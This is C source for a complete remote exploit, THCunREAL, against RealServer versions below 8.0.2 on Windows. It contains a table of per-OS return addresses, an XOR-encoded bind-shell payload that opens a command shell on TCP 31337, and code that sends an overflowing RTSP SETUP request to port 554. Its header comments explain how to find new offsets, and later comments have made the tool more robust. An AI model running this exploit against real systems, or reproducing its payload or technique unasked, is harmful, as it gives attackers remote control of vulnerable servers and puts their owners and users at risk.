/*****************************************************************************/
/* THCunREAL 0.1 - Wind0wZ remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* This exploit can be freely distributed ! If u r smart enough you can add */
/* further offsets for other OS Versions/Types/Servicespacks blabla.... */
/* */
/* The exploit was tested on 4 different boxes with RealServer 8.0.0.149 */
/* The bug is exploitable on Realservers < 8.0.2 */
/* */
/* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554 */
/* i noticed that 99% of the probed machines are not up2date yet ! =;O) */
/* */
/* The shellcode used in diz exploit is completely offsetless and XOR 0x20 */
/* encoded, coz Realserver doesn't allow the following bytes in the SETUP */
/* field : 0x00,0x0d,0x0a,0x25,0x20,0xff ! That's also the reason why i use */
/* mov dl,0x1f + add dl,0x01 for xor 0x20 encoding. hehehe... */
/* */
/* The shellcode itself scans for the KERNEL32.DLL by using FS:0 + searching */
/* for 'MZ' entry, followed by analysing the PE-Header for API offsets */
/* needed by this shellcode. After that we can load WS2_32.DLL for socket */
/* APIs and begin the usual shellcode process ! Thanx to several virus */
/* coders and Halvar Flake for that rocking idea ! I was wondering why so */
/* few people use it in their exploits today, given that LSD made this */
/* technique public at HiverCon 2002 ! Actually this one isn't */
/* optimized, but later shellcodes will have a size < 300 bytes. */
/* */
/* After successful exploitation of this bug, a commandshell should spawn on */
/* TCP port 31337 ! Use netcat to connect to this port ! */
/* */
/* To find further offsets use softice on windows or gdb on linux boxes ! */
/* If you're debugging with softice do the following to find offsets : */
/* Start the Realserver 8 ! ;) */
/* Enter softice and do the following commands : */
/* addr rmserver + bpx 405cfc */
/* Start the exploit and softice will break on the following lines of code : */
/* */
/* mov ecx,[eax] */
/* lea edx,[ebp+FFFFF000] */
/* push 00 */
/* push edx */
/* push 80004005 */
/* push 80004005 */
/* push 03 */
/* call [ecx+0c] */
/* */
/* As we can overwrite EAX, we have to create 3 values */
/* (2 retlocs and 1 retaddr), to get control of a vuln system ! */
/* The good news is, that just the EAX value can differ on different OSs/SPs */
/* The rest can be calculated ! */
/* retloc2 = retloc1-8; */
/* retaddr = retloc1+8; */
/* */
/* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8 */
/* runs on. I just know it's also exploitable on other OSs ! */
/* So if u wanna exploit other platforms, try to get Realserver 8 and use */
/* gdb to find out, how this can be exploited ! Good luck ! */
/* */
/* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, zip, zilvio and the rest of the combo ...... */
/*****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
/* One exploitable target: a display label plus the single OS/SP-specific
 * address. Per the header, only this value differs between OS versions;
 * the other two words in the request are derived from it in main(). */
struct TARGETS {
	char *winver;           /* OS / service-pack label, printed by usage() */
	unsigned long retloc1;  /* target-specific word; main() uses retloc1-8 as retloc2 and retloc1+8 as retaddr */
};
/* Target table, indexed by argv[2]. The trailing {NULL,0} entry is the
 * sentinel usage() iterates up to; keep it last when adding rows.
 * The header says these were found against RealServer 8.0.0.149 — entries
 * for other OS/SP combinations have to be located with a debugger as the
 * header describes (breakpoint at rmserver+405cfc, read the value in EAX). */
struct TARGETS targets [] = {
{"Windows 2000 - SP2", 0x0434ecad},
{"Windows 2000 - SP3", 0x0433ecad},
{"Windows XP SP1", 0x03fdecad},
{"Windows NT4 SP6a", 0x0477ecb1},
{NULL,0},   /* sentinel — must stay last */
};
/* Win32 bind-shell payload (header: listens on TCP 31337 after exploitation).
 * Per the header it is position-independent and XOR 0x20 encoded so that none
 * of the bytes RealServer rejects in the SETUP field (0x00, 0x0d, 0x0a, 0x25,
 * 0x20, 0xff) appear in it; the leading bytes are presumably the decoder stub.
 * main() copies it with strlen(), so it must never contain a 0x00 byte — the
 * encoding already guarantees that, but keep it in mind when replacing the
 * payload. Content is opaque from here; see the header for its design notes. */
char w32portshell[] =
"\x8b\x7d\x08\x33\xc9\x33\x02\xb2\x1f\x80\xc2\x01\x66\x81\xc1"
"\x9d\x02\x83\xc7\x25\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xcb"
"\x49\xa5\xb6\xdf\xdf\xec\x67\xba\x5c\x3b\xea\x07\x1d\x96\x45"
"\x45\xe3\x4c\x2c\x01\x16\xc2\xb7\x86\x51\x16\x34\x68\x34\xef"
"\x1c\x61\x48\x37\xee\xed\xe9\xb8\xf2\xc0\x01\x99\xda\x7d\x6c"
"\xf8\x25\xda\x27\xbb\x5e\x90\x49\xa0\xdf\xdf\xdf\xdf\x4b\xf8"
"\xc3\x43\x49\x4e\x44\x42\x45\xf1\xf7\x43\x54\xf1\xf7\x53\x45"
"\x4e\x44\x53\x45\x43\x56\x52\xdf\xdf\xdf\xdf\x77\x73\x12\x7f"
"\x13\x12\x0e\x64\x6c\x6c\xdf\x7c\x43\x4d\x44\x0e\x45\x58\x45"
"\xdf\xcb\x22\xcb\x25\xc8\xd9\xdf\xdf\xdf\x7d\xa3\xcd\x54\x11"
"\xe0\xcb\x7b\x75\xa9\xc5\x40\xab\x65\x28\xab\x78\x1c\x21\xe3"
"\xab\x6b\x58\x21\xe1\xab\x59\x3c\x21\xe7\x77\xab\x59\x04\x21"
"\xe7\x77\xdf\x51\x30\x61\xab\x51\x3f\x69\x21\xe6\x11\xe9\xa9"
"\xe7\x11\xfb\x61\x8d\x21\xd8\x76\xa9\xe6\x11\xe0\x8c\x21\xe3"
"\xe1\xeb\x28\xa4\xe0\x55\xd4\x1b\x7d\x2c\x7e\x55\xc5\x78\x7a"
"\x09\xe1\x2f\x97\x2c\x6a\x7e\xab\x24\xae\x21\xd8\xa9\x64\x04"
"\x3c\x41\x7d\xe3\x94\x30\x09\xe4\x11\xe9\x44\xab\x31\xa9\xf7"
"\xab\x2f\xa1\xd9\xdf\xdf\xdf\xdf\x54\x24\xa9\xef\xcb\xd2\xab"
"\x5f\x24\x46\x11\xdf\x11\xe9\x95\x30\x46\xab\x37\x46\xa1\xda"
"\x6d\x7a\x54\x24\x09\xef\xcb\xd2\xa9\x5d\xdc\xad\x7d\x5c\xad"
"\x55\x27\x8d\x70\x60\x54\x2e\xb0\x77\xdf\xf3\xa9\x66\xdc\xa9"
"\xe1\xc9\xcd\xdf\xdf\xdf\x10\xe0\xa6\x65\x41\xa4\xe0\x54\x2d"
"\xad\x75\x77\x72\xdf\xf1\xa9\xe7\xc9\xf7\xdf\xdf\xdf\xad\x9d"
"\x48\xdf\xdf\xdf\x77\xdf\x75\x0f\xad\x55\x42\x21\xe7\x85\x85"
"\x10\xe0\xa8\x27\x11\xfb\x73\x4a\x21\x4a\x22\xdf\x75\x1b\xa9"
"\x65\xc4\xa9\x7d\xd0\xa9\x7d\xd4\xa9\x7d\xcc\x93\x22\xa9\x7d"
"\xc8\x2f\x97\x7d\x22\x2f\x97\x65\x24\x11\xf8\x46\xa9\x65\xca"
"\x4a\x30\xad\x7d\xc8\x73\xdf\x55\xc4\xdf\x75\x1f\x4a\x21\xdf"
"\x55\xc4\xdf\x75\x67\x11\xe0\xa9\x65\xfc\x60\xa9\x65\xc0\x90"
"\x2c\xa9\x65\xf8\x11\xe0\x70\xad\x7d\xf8\x73\xa9\xf9\xa3\xcb"
"\x24\x73\xa3\xcb\x24\x73\x70\x71\xa3\xcb\x24\x73\xa3\xcb\x24"
"\x73\xab\x7d\x2b\xdf\xf3\xdf\xf3\xad\x65\xa4\x70\xdf\x75\x37"
"\xab\x65\xf4\xa9\x65\xe4\xa9\x65\xe0\xab\x65\xe8\xa9\x65\x9c"
"\x11\xe0\x46\xa9\x65\x94\xde\xe0\xde\xe4\xa9\x65\x90\xde\xe8"
"\xa6\x65\x4a\xad\xbd\x48\xdf\xdf\xdf\xad\xb5\x54\xdf\xdf\xdf"
"\xad\x6d\xa4\x11\xe0\x72\x71\x70\x70\x70\x4a\x21\x70\x70\x70"
"\x73\xdf\x75\x27\x11\xe0\x70\x70\xdf\x55\xc4\xdf\x75\x63\xa9"
"\x65\xc4\xad\x9d\x4c\xcf\xdf\xdf\x4a\x5e\xdf\x75\x2f\x11\xfb"
"\x73\xad\xad\x50\xdf\xdf\xdf\x71\x73\x73\x73\xdf\x55\xf0\xdf"
"\x75\x3f\x19\xbd\x50\xdf\xdf\xdf\x54\x17\x73\xad\xb5\x4c\xdf"
"\xdf\xdf\x72\xab\xb5\x50\xdf\xdf\xdf\x94\xde\x10\xe0\x46\xa5"
"\xe2\x54\x24\x96\x22\x10\xf2\x72\x77\xdf\x55\xf0\xdf\x75\x03"
"\xa5\xe0\x54\x18\x73\xdf\x95\x4c\xdf\xdf\xdf\x77\xdf\x55\xc4"
"\xdf\x75\x6b\xcb\x83\x73\x11\xe0\x94\x22\x70\x77\xdf\x55\xc4"
"\xdf\x75\x6f\x60\x54\x38\x68\x54\x35\x73\xad\xb5\x50\xdf\xdf"
"\xdf\x72\x70\x77\xdf\x55\xec\xdf\x75\x07\xc9\x5b\xdf\xdf\xdf"
"\x48\xdf\xdf\xdf\xdf\xdf\x75\x2f";
void usage();
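/* Store a 32-bit value little-endian at p, independent of host byte order and
 * of sizeof(unsigned long). The target is x86, so the three address words in
 * the request have to be little-endian no matter where this tool is built;
 * the old direct pointer store only got that right on a 32-bit LE host. */
static void put_le32(unsigned char *p, unsigned long v)
{
	p[0] = (unsigned char)(v & 0xff);
	p[1] = (unsigned char)((v >> 8) & 0xff);
	p[2] = (unsigned char)((v >> 16) & 0xff);
	p[3] = (unsigned char)((v >> 24) & 0xff);
}

/*
 * Entry point. argv[1] = host name or dotted IP, argv[2] = index into
 * targets[] (see usage()).
 *
 * Builds the 4123-byte RTSP SETUP request described in the header comment:
 *   "SETUP /" | retloc2 | retaddr | shellcode | 'Z' padding | retloc1 |
 *   " RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n"
 * sends it to TCP/554 and tells the user to connect to the bind shell on
 * TCP/31337. Exit status is 0 on the normal path and -1 on setup errors,
 * as before.
 *
 * Fixes over the original: argv[2] is parsed strictly and bounds-checked
 * (atoi() turned garbage into target 0 and let negative indexes read past
 * targets[]); socket() failure is detected (it returns INVALID_SOCKET, never
 * 0, so "if (!sock)" could never fire); the resolved address is only copied
 * into sin_addr when it is exactly IPv4-sized; send() is checked; the
 * address words are written byte-wise instead of through an unaligned
 * unsigned long* cast.
 */
int main(int argc, char *argv[])
{
	/* Fixed layout of exploit_buffer; offsets come from the original code. */
	enum {
		BUF_LEN     = 4124,   /* storage size */
		EXPLOIT_LEN = 4123,   /* bytes actually sent */
		RETLOC2_OFF = 7,      /* immediately after "SETUP /" */
		RETADDR_OFF = 11,
		SHELL_OFF   = 15,
		RETLOC1_OFF = 4086,   /* the word that ends up in EAX (see header) */
		TAIL_OFF    = 4090    /* 33-byte request trailer */
	};
	static const char tail[] = " RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n";
	const size_t shell_len = sizeof w32portshell - 1;   /* payload contains no NUL (header) */
	const size_t ntargets = sizeof targets / sizeof targets[0] - 1;   /* minus NULL sentinel */
	unsigned short realport = 554;
	SOCKET sock;
	unsigned long addr = INADDR_NONE;
	long tnum;
	char *endp;
	unsigned char exploit_buffer[BUF_LEN];
	unsigned long retloc1, retloc2, retaddr;
	struct sockaddr_in mytcp;
	struct hostent *hp;
	WSADATA wsaData;

	printf("\nTHCunREAL v0.1 - Wind0wZ remote root sploit for Realserver < 8.0.2\n");
	printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");

	if (argc < 3)
		usage();

	/* Strict parse: reject non-numeric input, trailing junk, negative values
	 * and anything at or beyond the sentinel entry of targets[]. */
	tnum = strtol(argv[2], &endp, 10);
	if (endp == argv[2] || *endp != '\0' || tnum < 0 || (size_t)tnum >= ntargets)
		usage();

	retloc1 = targets[tnum].retloc1;
	retloc2 = retloc1 - 8;   /* header: retloc2 = retloc1-8 */
	retaddr = retloc1 + 8;   /* header: retaddr = retloc1+8 */

	/* If someone swaps in a bigger payload it must not overrun the retloc1
	 * slot; the original silently would have. */
	if (SHELL_OFF + shell_len > RETLOC1_OFF) {
		printf("shellcode too large for request layout\n");
		exit(-1);
	}

	/* 'Z' padding everywhere, then the pieces at their fixed offsets.
	 * sizeof tail - 1 is 33, so the trailer ends exactly at EXPLOIT_LEN. */
	memset(exploit_buffer, 'Z', EXPLOIT_LEN);
	memcpy(exploit_buffer, "SETUP /", 7);
	put_le32(&exploit_buffer[RETLOC2_OFF], retloc2);
	put_le32(&exploit_buffer[RETADDR_OFF], retaddr);
	memcpy(&exploit_buffer[SHELL_OFF], w32portshell, shell_len);
	put_le32(&exploit_buffer[RETLOC1_OFF], retloc1);
	memcpy(&exploit_buffer[TAIL_OFF], tail, sizeof tail - 1);

	if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0) {
		printf("WSAStartup failed !\n");
		exit(-1);
	}

	memset(&mytcp, 0, sizeof mytcp);
	hp = gethostbyname(argv[1]);
	if (hp != NULL) {
		/* Only an IPv4 answer fits sin_addr; refuse anything else rather
		 * than memcpy'ing h_length bytes into a 4-byte field. */
		if (hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof mytcp.sin_addr) {
			printf("Unable to resolve %s\n", argv[1]);
			exit(-1);
		}
		memcpy(&mytcp.sin_addr, hp->h_addr, sizeof mytcp.sin_addr);
	} else {
		/* Not a resolvable name: fall back to dotted-quad parsing. */
		addr = inet_addr(argv[1]);
		if (addr == INADDR_NONE) {
			printf("Unable to resolve %s\n", argv[1]);
			exit(-1);
		}
		mytcp.sin_addr.s_addr = addr;
	}
	mytcp.sin_family = AF_INET;
	mytcp.sin_port = htons(realport);

	/* Winsock signals failure with INVALID_SOCKET (~0); 0 is a valid handle. */
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock == INVALID_SOCKET) {
		printf("socket() error...\n");
		exit(-1);
	}

	if (connect(sock, (struct sockaddr *)&mytcp, sizeof mytcp) == 0) {
		if (send(sock, (const char *)exploit_buffer, EXPLOIT_LEN, 0) != EXPLOIT_LEN) {
			printf("send() failed or short send !\n");
		} else {
			printf("\nexploit send .... sleeping a while ....\n");
			Sleep(1000);
			printf("\nok ... now try to connect to port 31337 via netcat !\n");
		}
	} else {
		printf("can't connect to realserver port!\n");
	}

	shutdown(sock, 1);
	closesocket(sock);
	WSACleanup();
	exit(0);
}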
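/*
 * Print the command line syntax and the numbered target list, then exit.
 * Called from main() on a missing or out-of-range target argument.
 * Walks targets[] up to its {NULL,0} sentinel, so the printed indexes are
 * exactly the ones main() accepts. The loop counter is unsigned, so it is
 * printed with %u (the original used %d, a format/type mismatch).
 * Exit status stays 0 as in the original; callers scripting this tool
 * should not rely on it to distinguish a usage error from success.
 */
void usage(void)
{
	unsigned int a;

	printf("\nUsage: <Host> <target-type>\n");
	printf("\nTargets available :\n\n");
	for (a = 0; targets[a].winver != NULL; a++)
		printf("%u) - %s\n", a, targets[a].winver);
	exit(0);
}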